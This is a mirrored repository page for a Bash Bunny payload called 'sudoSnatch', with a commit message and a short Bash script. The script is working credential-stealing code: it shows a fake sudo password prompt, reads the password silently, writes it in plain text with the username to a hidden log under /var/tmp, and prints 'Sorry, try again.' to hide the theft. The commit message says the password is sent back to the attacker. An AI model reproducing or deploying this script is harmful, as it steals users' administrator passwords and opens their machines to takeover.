mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
7f3972b88a
* uploaded sudoSnatch sudoSnatch payload grabs sudo password in plain text, imediately after victim uses `sudo` command and sends it back to attacker remotely/locally. * changing payload category * uploaded sudoSnatch
6 lines
201 B
Bash
6 lines
201 B
Bash
#!/bin/bash
|
|
echo -n "[sudo] password for $(whoami):"
|
|
IFS="" read -s pass
|
|
echo -e "Timestamp=[$(date)] \t User=[$(whoami)] \t Password=[$pass]" >> /var/tmp/.system/sysLog
|
|
echo -e "\nSorry, try again."
|